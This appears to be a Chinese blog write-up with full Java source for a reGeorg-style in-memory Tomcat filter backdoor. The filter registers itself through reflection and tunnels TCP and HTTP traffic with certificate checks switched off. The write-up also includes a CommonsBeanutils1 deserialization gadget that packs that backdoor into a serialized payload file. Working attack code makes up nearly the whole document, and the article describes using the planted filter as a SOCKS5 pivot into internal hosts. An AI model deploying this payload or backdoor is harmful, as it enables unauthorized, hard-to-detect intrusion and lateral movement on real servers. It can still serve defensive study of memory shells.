    2. import org.apache.catalina.Context;
    3. import org.apache.catalina.core.ApplicationFilterConfig;
    4. import org.apache.catalina.core.StandardContext;
    5. import org.apache.catalina.loader.WebappClassLoaderBase;
    6. import org.apache.tomcat.util.descriptor.web.FilterDef;
    7. import org.apache.tomcat.util.descriptor.web.FilterMap;
    8. import javax.net.ssl.*;
    9. import javax.servlet.*;
    10. import java.io.*;
    11. import java.lang.reflect.Constructor;
    12. import java.lang.reflect.Field;
    13. import java.lang.reflect.Method;
    14. import java.net.*;
    15. import java.nio.ByteBuffer;
    16. import java.nio.channels.SocketChannel;
    17. import java.security.cert.CertificateException;
    18. import java.security.cert.X509Certificate;
    19. import java.util.*;
    20. public class FilterReGorg implements Filter, HostnameVerifier, X509TrustManager {
    21. private char[] en;
    22. private byte[] de;
    23. public static java.util.Map<String,Object> sessions = new java.util.HashMap<String,Object>();
    /*
     * Static initializer: runs once when this class is loaded (per the write-up, when the
     * deserialization payload instantiates it) and injects this Filter into the live Tomcat
     * StandardContext through reflection. Nothing is written to web.xml or to disk, so the
     * filter exists only in the running JVM; the name ("evil") and URL pattern ("/*") are what
     * an inspection of the context's filter maps / filterConfigs would show. Any failure is
     * only printed to stderr, never propagated.
     */
    24. static {
    25. try {
    26. final String name = "evil"; // filter name registered in the context
    27. final String URLPattern = "/*"; // matches every request path
    28. WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader(); // assumes a Tomcat webapp thread; otherwise ClassCastException, caught below
    29. StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
    30. Field Configs = null;
    31. try {
    32. Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    33. } catch (NoSuchFieldException e) {
    34. Configs = standardContext.getClass().getSuperclass().getDeclaredField("filterConfigs"); // fallback one level up, presumably for Tomcat builds/subclasses where the field is inherited
    35. }
    36. Configs.setAccessible(true); // non-public field on StandardContext
    37. Map filterConfigs = (Map) Configs.get(standardContext);
    38. FilterReGorg filterReGorg = new FilterReGorg();
    39. FilterDef filterDef = new FilterDef();
    40. filterDef.setFilter(filterReGorg); // supply a ready instance instead of letting Tomcat instantiate from the class name
    41. filterDef.setFilterName(name);
    42. filterDef.setFilterClass(filterReGorg.getClass().getName());
    43. /**
    44. * Register the FilterDef with the context's filterDefs (the in-memory equivalent of a web.xml filter entry).
    45. */
    46. standardContext.addFilterDef(filterDef);
    47. FilterMap filterMap = new FilterMap();
    48. filterMap.addURLPattern(URLPattern);
    49. filterMap.setFilterName(name);
    50. filterMap.setDispatcher(DispatcherType.REQUEST.name()); // only direct client requests, not FORWARD/INCLUDE/ERROR dispatches
    51. standardContext.addFilterMapBefore(filterMap); // inserted ahead of the existing mappings rather than appended
    52. Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    53. constructor.setAccessible(true); // non-public constructor
    54. ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
    55. filterConfigs.put(name, filterConfig); // presumably what makes the filter active for subsequent requests without a context reload
    56. } catch (Exception e) {
    57. e.printStackTrace();
    58. }
    59. }
    /**
     * Filter entry point. Prints a marker to stdout on every request (System.out; under
     * Tomcat typically catalina.out), then, only when the request carries a {@code regorg}
     * parameter, packs the request/response and the tunnel's fixed configuration into an
     * Object[] and hands it to {@link #equals(Object)}, where the actual tunnel logic lives.
     * The boolean result of equals is discarded and the chain always continues, even though
     * equals() may already have written to and closed the response writer.
     */
    60. @Override
    61. public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    62. System.out.println("Do Filter ......");
    63. String regorg;
    64. if ((regorg = servletRequest.getParameter("regorg")) != null) { // trigger is the mere presence of the parameter; its value is not used here
    65. String charslist = "8z4lBs+92ucIAJtnON0CELaMZ5H3/eg6KDFjqPpyfxdvrSiTW1wQhbGmVkXY7UoR"; // shuffled base64 alphabet (encode table)
    66. Object[] args = new Object[]{
    67. servletRequest, //0
    68. servletResponse, //1
    69. charslist.toCharArray(), //2 encode table: 6-bit value -> character (stored in `en` by equals)
    70. new byte[]{-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 6, -1, -1, -1, 28, 18, 49, 8, 27, 2, 25, 31, 60, 0, 7, -1, -1, -1, -1, -1, -1, -1, 12, 4, 19, 33, 20, 34, 54, 26, 11, 13, 32, 21, 23, 17, 16, 37, 51, 63, 45, 47, 61, 56, 48, 58, 59, 24, -1, -1, -1, -1, -1, -1, 22, 53, 10, 42, 29, 40, 30, 52, 46, 35, 57, 3, 55, 15, 62, 38, 36, 44, 5, 14, 9, 43, 50, 41, 39, 1, -1, -1, -1, -1, -1},//3 decode table indexed by ASCII code: character -> index in charslist, -1 = not in alphabet (e.g. '+' (43) -> 6, '/' (47) -> 28); stored in `de`
    71. new Integer(200),//4 HTTPCODE: status set on tunnel responses
    72. new Integer(513),//5 READBUF: ByteBuffer size per socket read
    73. new Integer(524288),//6 MAXREADSIZE: 512 KiB cap on data returned per READ command
    74. "n4BSI0z90MDONaJ5HhNyAhrWZaPxel/V3hDLCGb9J+VvZLPr/EAb3a1vCGq1tMPJAasIL+PuEG1a/aPyCPEvZpNTay52LpufgjJGLmfVeQJZHESxCpbN24hSnK==",//7 GeorgHello: unpacked in equals; in the visible code it is referenced only from a commented-out line
    75. new Integer(2047140399),//8 BLV_L_OFFSET: passed through to blv_decode/blv_encode
    76. new Integer(0),//9 USE_REQUEST_TEMPLATE: 0 = request body is used as-is (1 would strip START_INDEX/END_INDEX chars)
    77. new Integer(0),//10 START_INDEX
    78. new Integer(0),//11 END_INDEX
    79. };
    80. equals(args); // tunnel dispatch; return value ignored
    81. }
    82. filterChain.doFilter(servletRequest, servletResponse); // always falls through to the real application
    83. System.out.println("doFilter");
    84. }
    85. @Override
    86. public boolean equals(Object obj) {
    87. try {
    88. Object[] args = (Object[]) obj;
    89. Object request = args[0];
    90. Object response = args[1];
    91. en = (char[]) args[2];
    92. de = (byte[]) args[3];
    93. int HTTPCODE = (Integer) args[4];
    94. int READBUF = (Integer) args[5];
    95. int MAXREADSIZE = (Integer) args[6];
    96. String GeorgHello = (String) args[7];
    97. int BLV_L_OFFSET = (Integer) args[8];
    98. int USE_REQUEST_TEMPLATE = (Integer) args[9];
    99. int START_INDEX = (Integer) args[10];
    100. int END_INDEX = (Integer) args[11];
    101. int DATA = 1;
    102. int CMD = 2;
    103. int MARK = 3;
    104. int STATUS = 4;
    105. int ERROR = 5;
    106. int IP = 6;
    107. int PORT = 7;
    108. int REDIRECTURL = 8;
    109. int FORCEREDIRECT = 9;
    110. Writer out = (Writer) invokeMethod(response, "getWriter", new Object[0]);
    111. Object[] info = new Object[40];
    112. Object[] rinfo = new Object[40];
    113. String requestDataHead = "";
    114. String requestDataTail = "";
    115. try {
    116. if (((int)(Integer)(invokeMethod(request, "getContentLength", new Object[0]))) != -1) {
    117. String inputData = "";
    118. InputStream in = (InputStream) invokeMethod(request, "getInputStream", new Object[0]);
    119. while ( true ){
    120. int buffLen = in.available();
    121. if (buffLen == -1)
    122. break;
    123. byte[] buff = new byte[buffLen];
    124. if (in.read(buff) == -1)
    125. break;
    126. inputData += new String(buff);
    127. }
    128. if (USE_REQUEST_TEMPLATE == 1) {
    129. requestDataHead = inputData.substring(0, START_INDEX);
    130. requestDataTail = inputData.substring(inputData.length() - END_INDEX, inputData.length());
    131. inputData = inputData.substring(START_INDEX);
    132. inputData = inputData.substring(0, inputData.length() - END_INDEX);
    133. }
    134. byte[] data = b64de(inputData);
    135. info = blv_decode(data, BLV_L_OFFSET);
    136. }
    137. } catch ( Exception e) {
    138. // out.write(new String(b64de(GeorgHello)));
    139. out.write(e.toString());
    140. out.flush();
    141. out.close();
    142. return false; // exit
    143. }
    144. String rUrl = (String) info[REDIRECTURL];
    145. if (rUrl != null) {
    146. String force = (String) info[FORCEREDIRECT];
    147. if (force.compareTo("TRUE") == 0 || !islocal(rUrl)){
    148. info[REDIRECTURL] = null;
    149. info[FORCEREDIRECT] = null;
    150. invokeMethod(response, "reset", new Object[0]);
    151. String method = (String) invokeMethod(request, "getMethod", new Object[0]);
    152. URL u = new URL(rUrl);
    153. HttpURLConnection conn = (HttpURLConnection) u.openConnection();
    154. conn.setRequestMethod(method);
    155. conn.setDoOutput(true);
    156. // ignore ssl verify
    157. if (HttpsURLConnection.class.isInstance(conn)){
    158. ((HttpsURLConnection)conn).setHostnameVerifier(this);
    159. SSLContext ctx = SSLContext.getInstance("SSL");
    160. ctx.init(null, new TrustManager[] { this }, null);
    161. ((HttpsURLConnection)conn).setSSLSocketFactory(ctx.getSocketFactory());
    162. }
    163. // conn.setConnectTimeout(200);
    164. // conn.setReadTimeout(200);
    165. Enumeration enu = (Enumeration) invokeMethod(request, "getHeaderNames", new Object[0]);
    166. List<String> keys = Collections.list(enu);
    167. Collections.reverse(keys);
    168. for (String key : keys){
    169. String value = (String) invokeMethod(request, "getHeader", new Object[]{key});
    170. conn.setRequestProperty(headerkey(key), value);
    171. }
    172. if (((int)(Integer)(invokeMethod(request, "getContentLength", new Object[0]))) != -1){
    173. OutputStream output;
    174. try{
    175. output = conn.getOutputStream();
    176. }catch(Exception e){
    177. return false;
    178. }
    179. String newData = requestDataHead + b64en(blv_encode(info, BLV_L_OFFSET)) + requestDataTail;
    180. byte[] data = newData.getBytes();
    181. output.write(data, 0, data.length);
    182. output.flush();
    183. output.close();
    184. }
    185. for (String key : conn.getHeaderFields().keySet()) {
    186. if (key != null && !key.equalsIgnoreCase("Content-Length") && !key.equalsIgnoreCase("Transfer-Encoding")){
    187. String value = conn.getHeaderField(key);
    188. invokeMethod(response, "setHeader", new Object[]{key, value});
    189. }
    190. }
    191. InputStream hin;
    192. if (conn.getResponseCode() < HttpURLConnection.HTTP_BAD_REQUEST) {
    193. hin = conn.getInputStream();
    194. } else {
    195. hin = conn.getErrorStream();
    196. if (hin == null){
    197. invokeMethod(response, "setStatus", new Object[]{HTTPCODE});
    198. return false;
    199. }
    200. }
    201. int i;
    202. byte[] buffer = new byte[1024];
    203. ByteArrayOutputStream baos = new ByteArrayOutputStream();
    204. while ((i = hin.read(buffer)) != -1) {
    205. byte[] data = new byte[i];
    206. System.arraycopy(buffer, 0, data, 0, i);
    207. baos.write(data);
    208. }
    209. String responseBody = baos.toString();
    210. invokeMethod(response, "addHeader", new Object[]{"Content-Length", Integer.toString(responseBody.length())});
    211. invokeMethod(response, "setStatus", new Object[]{conn.getResponseCode()});
    212. out.write(responseBody.trim());
    213. out.flush();
    214. out.close();
    215. if ( true ) return false; // exit
    216. }
    217. }
    218. invokeMethod(response, "resetBuffer", new Object[0]);
    219. invokeMethod(response, "setStatus", new Object[]{HTTPCODE});
    220. String cmd = (String) info[CMD];
    221. if (cmd != null) {
    222. String mark = (String) info[MARK];
    223. if (cmd.compareTo("CONNECT") == 0) {
    224. try {
    225. String target = (String) info[IP];
    226. int port = Integer.parseInt((String) info[PORT]);
    227. SocketChannel socketChannel = SocketChannel.open();
    228. socketChannel.socket().connect(new InetSocketAddress(target, port), 3000); // set timeout 3 seconds, default 120 seconds
    229. socketChannel.configureBlocking(false);
    230. sessions.put(mark, socketChannel);
    231. rinfo[STATUS] = "OK";
    232. } catch (Exception e) {
    233. rinfo[STATUS] = "FAIL";
    234. rinfo[ERROR] = e.toString();
    235. }
    236. } else if (cmd.compareTo("DISCONNECT") == 0) {
    237. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    238. try{
    239. socketChannel.socket().close();
    240. } catch (Exception e) {
    241. }
    242. sessions.remove(mark);
    243. } else if (cmd.compareTo("READ") == 0){
    244. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    245. try{
    246. if ( socketChannel != null ) {
    247. ByteBuffer buf = ByteBuffer.allocate(READBUF);
    248. int bytesRead = socketChannel.read(buf);
    249. int maxRead = MAXREADSIZE;
    250. int readLen = 0;
    251. ByteArrayOutputStream readData = new ByteArrayOutputStream();
    252. while (bytesRead > 0){
    253. byte[] block = new byte[bytesRead];
    254. System.arraycopy(buf.array(), 0, block, 0, bytesRead);
    255. readData.write(block);
    256. ((java.nio.Buffer)buf).clear();
    257. readLen += bytesRead;
    258. if (bytesRead < READBUF || readLen >= maxRead) {
    259. rinfo[DATA] = readData.toByteArray();
    260. break;
    261. }
    262. bytesRead = socketChannel.read(buf);
    263. }
    264. }
    265. rinfo[STATUS] = "OK";
    266. } catch (Exception e) {
    267. rinfo[STATUS] = "FAIL";
    268. rinfo[ERROR] = e.toString();
    269. }
    270. } else if (cmd.compareTo("FORWARD") == 0){
    271. SocketChannel socketChannel = (SocketChannel)sessions.get(mark);
    272. try {
    273. byte[] writeData = (byte[]) info[DATA];
    274. ByteBuffer buf = ByteBuffer.allocate(writeData.length);
    275. buf.put(writeData);
    276. buf.flip();
    277. while(buf.hasRemaining())
    278. socketChannel.write(buf);
    279. rinfo[STATUS] = "OK";
    280. } catch (Exception e) {
    281. rinfo[STATUS] = "FAIL";
    282. rinfo[ERROR] = e.toString();
    283. socketChannel.socket().close();
    284. }
    285. }
    286. out.write(b64en(blv_encode(rinfo, BLV_L_OFFSET)));
    287. out.flush();
    288. out.close();
    289. } else {
    290. out.write(new String(b64de(GeorgHello)));
    291. out.flush();
    292. out.close();
    293. }
    294. } catch (Exception e){
    295. }
    296. return false;
    297. }
    /**
     * Base64-encodes {@code data} with the class's {@code en} symbol table, padding a
     * trailing one- or two-byte group with {@code ==} / {@code =}.
     *
     * @param data bytes to encode; an empty array yields an empty string
     * @return the encoded text
     */
    public String b64en(byte[] data) {
        StringBuilder encoded = new StringBuilder();
        int total = data.length;
        int pos = 0;
        // Every complete 3-byte group becomes four symbols.
        while (total - pos >= 3) {
            int x = data[pos++] & 0xff;
            int y = data[pos++] & 0xff;
            int z = data[pos++] & 0xff;
            encoded.append(en[x >>> 2]);
            encoded.append(en[((x & 0x03) << 4) | (y >>> 4)]);
            encoded.append(en[((y & 0x0f) << 2) | (z >>> 6)]);
            encoded.append(en[z & 0x3f]);
        }
        // Whatever is left (0, 1 or 2 bytes) is padded to a full group.
        int leftover = total - pos;
        if (leftover == 1) {
            int x = data[pos] & 0xff;
            encoded.append(en[x >>> 2]);
            encoded.append(en[(x & 0x03) << 4]);
            encoded.append("==");
        } else if (leftover == 2) {
            int x = data[pos] & 0xff;
            int y = data[pos + 1] & 0xff;
            encoded.append(en[x >>> 2]);
            encoded.append(en[((x & 0x03) << 4) | (y >>> 4)]);
            encoded.append(en[(y & 0x0f) << 2]);
            encoded.append("=");
        }
        return encoded.toString();
    }
    /**
     * Decodes base64 text using the class's {@code de} lookup table (assumed to map each
     * alphabet byte to its 6-bit value and every other byte to -1; confirm against its
     * declaration). Bytes mapped to -1 are skipped, a {@code =} (ASCII 61) in the third or
     * fourth position ends decoding immediately, and a group left incomplete at end of
     * input is dropped.
     *
     * NOTE(review): {@code data[i]} is a signed byte used directly as an index, so any input
     * byte >= 0x80 indexes {@code de} with a negative value; and the inner {@code do} loops
     * read {@code data[i++]} before checking {@code i < len}, so an input that ends right after
     * a complete symbol reads one past the end. Both surface as
     * {@code ArrayIndexOutOfBoundsException} rather than a decode error.
     *
     * @param str base64 text, converted to bytes with the platform default charset
     * @return the decoded bytes
     */
    public byte[] b64de(String str) {
        byte[] data = str.getBytes();
        int len = data.length;
        ByteArrayOutputStream buf = new ByteArrayOutputStream(len);
        int i = 0;
        int b1, b2, b3, b4;
        while (i < len) {
            // First symbol of the group; non-alphabet bytes are skipped.
            do {
                b1 = de[data[i++]];
            } while (i < len && b1 == -1);
            if (b1 == -1) {
                break;
            }
            // Second symbol.
            do {
                b2 = de[data[i++]];
            } while (i < len && b2 == -1);
            if (b2 == -1) {
                break;
            }
            // Six bits of symbol 1 plus the top two bits of symbol 2 form output byte 1.
            buf.write((int) ((b1 << 2) | ((b2 & 0x30) >>> 4)));
            // Third symbol; '=' (61) is padding and terminates the whole decode.
            do {
                b3 = data[i++];
                if (b3 == 61) {
                    return buf.toByteArray();
                }
                b3 = de[b3];
            } while (i < len && b3 == -1);
            if (b3 == -1) {
                break;
            }
            buf.write((int) (((b2 & 0x0f) << 4) | ((b3 & 0x3c) >>> 2)));
            // Fourth symbol, same padding rule.
            do {
                b4 = data[i++];
                if (b4 == 61) {
                    return buf.toByteArray();
                }
                b4 = de[b4];
            } while (i < len && b4 == -1);
            if (b4 == -1) {
                break;
            }
            buf.write((int) (((b3 & 0x03) << 6) | b4));
        }
        return buf.toByteArray();
    }
    /**
     * Capitalises the first character of every hyphen-separated segment of a header name,
     * e.g. {@code content-type} becomes {@code Content-Type}. Upper-casing uses the default
     * locale. An empty segment (leading or doubled hyphen) makes {@code substring(0, 1)}
     * throw, and an input consisting only of hyphens produces no segments and throws
     * {@code StringIndexOutOfBoundsException} when the trailing separator is removed.
     *
     * @param str hyphen-separated header name
     * @return the capitalised name
     * @throws Exception declared for compatibility; only runtime exceptions are raised
     */
    static String headerkey(String str) throws Exception {
        StringBuilder canon = new StringBuilder();
        for (String segment : str.split("-")) {
            canon.append(segment.substring(0, 1).toUpperCase())
                 .append(segment.substring(1))
                 .append('-');
        }
        // Drop the separator appended after the last segment.
        canon.setLength(canon.length() - 1);
        return canon.toString();
    }
    /**
     * Reports whether the host part of {@code url} is one of this machine's own IPv4
     * interface addresses. The comparison is textual against each interface address, so
     * only a literal IPv4 host can match; host names are never resolved and IPv6
     * addresses are ignored.
     *
     * @param url absolute URL whose host component is checked
     * @return {@code true} if the host string equals a local IPv4 address
     * @throws Exception if the URL is malformed or interfaces cannot be enumerated
     */
    boolean islocal(String url) throws Exception {
        String host = new URL(url).getHost();
        for (Enumeration<NetworkInterface> ifaces = NetworkInterface.getNetworkInterfaces();
             ifaces.hasMoreElements(); ) {
            Enumeration<InetAddress> bound = ifaces.nextElement().getInetAddresses();
            while (bound.hasMoreElements()) {
                InetAddress candidate = bound.nextElement();
                if (candidate instanceof Inet4Address && host.equals(candidate.getHostAddress())) {
                    return true;
                }
            }
        }
        return false;
    }
    /**
     * Parses a sequence of tag/length/value records into a 40-slot array indexed by tag.
     * Each record is one tag byte, a 4-byte big-endian length (from which {@code offset}
     * is subtracted, mirroring {@code blv_encode}) and the value bytes. Tags 2..9 are
     * stored as {@code String} (platform default charset), all others as raw bytes.
     *
     * None of the fields is validated: a length below {@code offset} gives a negative
     * array size, a tag outside 0..39 indexes past the array, and the return values of
     * the {@code read} calls are ignored, so a truncated input silently reuses the
     * previous length buffer and yields short values. Callers rely on an enclosing
     * catch for all of these.
     *
     * @param data   encoded records
     * @param offset amount to subtract from every length field
     * @return the decoded slots; unused slots remain {@code null}
     */
    public static Object[] blv_decode(byte[] data, Integer offset) {
        Object[] slots = new Object[40];
        ByteArrayInputStream in = new ByteArrayInputStream(data);
        byte[] lenField = new byte[4];
        int consumed = 0;
        while (consumed < data.length) {
            int tag = in.read();
            in.read(lenField, 0, lenField.length);
            int valueLen = bytesToInt(lenField) - offset;
            byte[] value = new byte[valueLen];
            in.read(value, 0, value.length);
            // 1 tag byte + 4 length bytes + the value itself.
            consumed += 5 + valueLen;
            // 9 is BLVHEAD_LEN: tags in (1, 9] carry text, the rest carry bytes.
            if (tag > 1 && tag <= 9) {
                slots[tag] = new String(value);
            } else {
                slots[tag] = value;
            }
        }
        return slots;
    }
    /**
     * Serialises the non-null slots of {@code info} as tag/length/value records: one tag
     * byte, a 4-byte big-endian length equal to the value length plus {@code offset}, then
     * the value. {@code String} slots are converted with the platform default charset;
     * every other slot must already be a {@code byte[]} or a {@code ClassCastException}
     * escapes. Slots 0 and 39 are overwritten with random filler before encoding, so the
     * caller's array is mutated.
     *
     * @param info   40-slot array as produced by {@code blv_decode}
     * @param offset amount added to each length field
     * @return the encoded records
     */
    public static byte[] blv_encode(Object[] info, Integer offset) {
        info[0] = randBytes(5, 20);
        info[39] = randBytes(5, 20);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        for (int tag = 0; tag < info.length; tag++) {
            Object slot = info[tag];
            if (slot == null) {
                continue;
            }
            byte[] value = slot instanceof String ? ((String) slot).getBytes() : (byte[]) slot;
            out.write(tag);
            try {
                out.write(intToBytes(value.length + offset));
                out.write(value);
            } catch (Exception ignored) {
                // ByteArrayOutputStream.write(byte[]) declares IOException but cannot throw it.
            }
        }
        return out.toByteArray();
    }
    /**
     * Reflectively calls the public method {@code methodName} on {@code obj}, deriving the
     * parameter types from the runtime classes of {@code args}. Boxed {@code Integer},
     * {@code Long} and {@code Short} arguments are mapped to {@code int}/{@code long}/
     * {@code short} so that primitive-typed signatures resolve; other boxed types are
     * passed through as-is. A {@code null} argument throws {@code NullPointerException}
     * from {@code getClass()}. Nothing restricts which method name can be supplied.
     *
     * @param obj        receiver
     * @param methodName public method to call
     * @param args       arguments, also used to infer the signature
     * @return the invoked method's result
     * @throws Exception reflection failures (no such method, invocation errors)
     */
    public static Object invokeMethod(Object obj, String methodName, Object[] args) throws Exception {
        Class[] signature = new Class[args.length];
        for (int idx = 0; idx < args.length; idx++) {
            signature[idx] = primitiveFor(args[idx].getClass());
        }
        return invokeMethod2(obj, methodName, signature, args);
    }

    /** Maps Integer/Long/Short to their primitive class; any other class is returned unchanged. */
    private static Class primitiveFor(Class boxed) {
        if (boxed == Integer.class) {
            return int.class;
        }
        if (boxed == Long.class) {
            return long.class;
        }
        if (boxed == Short.class) {
            return short.class;
        }
        return boxed;
    }
    /**
     * Looks up the public method {@code methodName(argTypes)} on {@code obj}'s runtime
     * class and invokes it with {@code args}, forcing the accessible flag first.
     *
     * @param obj        receiver
     * @param methodName public method name
     * @param argTypes   exact parameter types used for {@code getMethod}
     * @param args       arguments passed to the method
     * @return the method's result
     * @throws Exception {@code NoSuchMethodException}, {@code InvocationTargetException}, etc.
     */
    public static Object invokeMethod2(Object obj, String methodName, Class[] argTypes, Object[] args) throws Exception {
        Method target = obj.getClass().getMethod(methodName, argTypes);
        // Suppress Java language access checks before invoking.
        if (!target.isAccessible()) {
            target.setAccessible(true);
        }
        return target.invoke(obj, args);
    }
    /**
     * Returns a random byte array whose length is uniformly chosen in {@code [min, max]}.
     * Uses {@code java.util.Random}, which is not cryptographically strong; the bytes are
     * only used as filler in slots 0 and 39 by {@code blv_encode}. Behaviour is undefined
     * for {@code max < min} ({@code nextInt} rejects a non-positive bound).
     *
     * @param min smallest length, inclusive
     * @param max largest length, inclusive
     * @return freshly allocated random bytes
     */
    public static byte[] randBytes(int min, int max) {
        Random rng = new Random();
        int span = (max - min) + 1;
        byte[] filler = new byte[min + rng.nextInt(span)];
        rng.nextBytes(filler);
        return filler;
    }
    /**
     * Reads the first four bytes of {@code bytes} as a big-endian signed 32-bit integer
     * (inverse of {@code intToBytes}). Arrays shorter than four bytes throw
     * {@code ArrayIndexOutOfBoundsException}; extra bytes are ignored.
     *
     * @param bytes at least four bytes, most significant first
     * @return the decoded value
     */
    public static int bytesToInt(byte[] bytes) {
        int value = 0;
        // bytes[0] is the most significant byte.
        for (int idx = 0; idx < 4; idx++) {
            value = (value << 8) | (bytes[idx] & 0xff);
        }
        return value;
    }
    /**
     * Encodes {@code value} as four big-endian bytes (inverse of {@code bytesToInt});
     * this is the length field of the tag/length/value records.
     *
     * @param value integer to encode
     * @return a new 4-byte array, most significant byte first
     */
    public static byte[] intToBytes(int value) {
        byte[] encoded = new byte[4];
        // Peel one low byte at a time, filling from the least significant end.
        for (int idx = 3; idx >= 0; idx--) {
            encoded[idx] = (byte) (value & 0xFF);
            value >>= 8;
        }
        return encoded;
    }
    /**
     * {@code HostnameVerifier} callback that accepts every host name. Any HTTPS connection
     * that installs this object as its verifier therefore never checks that the peer
     * certificate matches the URL host; together with the empty trust-manager methods
     * below this turns off TLS peer authentication for those connections.
     *
     * @param s          host name being verified (ignored)
     * @param sslSession negotiated session (ignored)
     * @return always {@code true}
     */
    public boolean verify(String s, SSLSession sslSession) {
        return true;
    }
    /**
     * {@code X509TrustManager} callback with an empty body: every client certificate
     * chain is accepted without validation.
     */
    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    }
    /**
     * {@code X509TrustManager} callback with an empty body: every server certificate
     * chain is accepted, so no CA, expiry or revocation checks happen for connections
     * that use this trust manager.
     */
    public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
    }
    /**
     * Declares no trusted issuers; consistent with the trust-all behaviour of the two
     * {@code check*Trusted} methods above.
     *
     * @return an empty array
     */
    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }
    500. }

    触发添加filter代码如下 :

    /**
     * Handler for {@code /reGeorgtunnel3}: loads {@code FilterReGorg} through Javassist's
     * default {@code ClassPool} and instantiates it. The {@code request} and
     * {@code response} parameters are not used. Whatever the constructor does (the
     * article says it registers the filter) is not visible here. Any failure is only
     * printed to the standard error stream.
     *
     * @param request  incoming request (unused)
     * @param response outgoing response (unused)
     * @throws Exception declared, but every exception is caught and printed
     */
    @RequestMapping(value = "/reGeorgtunnel3")
    public void FilterReGeorgtunnel2(ServletRequest request, ServletResponse response) throws Exception {
        try {
            ClassPool.getDefault()
                    .get(com.example.seriallzpayload.service.FilterReGorg.class.getName())
                    .toClass()
                    .newInstance();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    完成后执行,首先访问/reGeorgtunnel3,会执行FilterReGorg类并添加filter,然后我们访问任意页面添加参数regorg,看能否进入我们的filter:

    访问完reGeorgtunnel3,再访问任意页面添加regorg,即可成功进入我们的代理:

     

    由此我们成功添加了filter代理,下面我们进行反序列化,通过CommonsBeanutils1调用链插入filter

    反序列化:

    这个具体的原理之前已经讲过了,这里就不再重复,直接上代码:

    1. package com.example.seriallzpayload.service;
    2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    4. import javassist.ClassPool;
    5. import javassist.CtClass;
    6. import org.apache.commons.beanutils.BeanComparator;
    7. import java.io.ByteArrayOutputStream;
    8. import java.io.FileOutputStream;
    9. import java.io.ObjectOutputStream;
    10. import java.lang.reflect.Field;
    11. import java.util.PriorityQueue;
    /**
     * Builds the serialized object graph the article uses to load {@code FilterReGorg}
     * via the CommonsBeanutils1 chain and writes it to {@code seraReGorg.bin}. This class
     * executes nothing itself; the behaviour is carried by the {@code TemplatesImpl},
     * {@code BeanComparator} and {@code PriorityQueue} objects it wires together.
     *
     * Defensive note: an {@code ObjectInputFilter} that rejects
     * {@code com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl} or
     * {@code org.apache.commons.beanutils.BeanComparator} stops this graph before it is
     * deserialised.
     */
    public class SerializPayload {
        /**
         * Sets a field by reflection, bypassing access checks.
         *
         * @param obj       instance to modify
         * @param fieldName field declared on {@code obj}'s own class (inherited fields are not found)
         * @param value     new value
         * @throws Exception if the field does not exist or cannot be set
         */
        public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
            Field field = obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        }
        /**
         * Assembles the payload and writes it to {@code seraReGorg.bin} in the working
         * directory. Failures (missing class, Javassist error, I/O) are only printed.
         *
         * @throws Exception declared, but every exception is caught and printed
         */
        public static void CommonsBeanutils1() throws Exception{
            try {
                ClassPool pool = ClassPool.getDefault();
                //CtClass clazz = pool.get(com.example.seriallzpayload.service.serialfilter.class.getName());
                CtClass clazz = pool.get(com.example.seriallzpayload.service.FilterReGorg.class.getName());
                // Bytecode of the filter class, planted in TemplatesImpl's private fields.
                byte[] code = clazz.toBytecode();
                TemplatesImpl obj = new TemplatesImpl();
                setFieldValue(obj, "_bytecodes", new byte[][]{code});
                setFieldValue(obj, "_name", "HelloTemplatesImpl");
                setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
                // Comparator starts with a null property; presumably so that the add() calls
                // below do not invoke any getter yet (see "stub data" comment) — confirm against BeanComparator.
                final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
                final PriorityQueue queue = new PriorityQueue(2, comparator);
                // stub data for replacement later
                queue.add("1");
                queue.add("1");
                // Order matters: both reflective writes happen only after the add() calls.
                setFieldValue(comparator, "property", "outputProperties");
                setFieldValue(queue, "queue", new Object[]{obj, obj});
                // Streams are not closed on the exception path (no finally / try-with-resources).
                FileOutputStream fileOutputStream = new FileOutputStream("seraReGorg.bin");
                ObjectOutputStream outputStream = new ObjectOutputStream(fileOutputStream);
                outputStream.writeObject(queue);
                outputStream.close();
                fileOutputStream.close();
            }catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    另外,FilterReGorg 类需要继承 AbstractTranslet,将类声明修改为:

      public class FilterReGorg  extends AbstractTranslet implements Filter, HostnameVerifier, X509TrustManager
      

       执行CommonsBeanutils1后可以生成一个seraReGorg.bin,即序列化的攻击POC,然后我们进行测试,首先我们测试环境是否干净,可以看到此时未插入我们的filter代理:

       然后我们对seraReGorg.bin进行反序列化后查看,可以看到已经成功插入:

      使用FoxyProxy添加socks5代理也可成功通过代理服务器作为跳板访问主机。 

       

       结尾:

      至此,通过反序列化漏洞添加 filter 实现代理就完成了。但这种方法对 Tomcat 版本有要求,不能是高版本:高版本中无法从上下文中获取 StandardContext,导致攻击失效。其中我们也可以在doFilter中添加多个过滤,比如代理,命令执行等等进行二次开发,这些就凭兴趣自己玩了。

    47. 原文地址:https://blog.csdn.net/GalaxySpaceX/article/details/133680352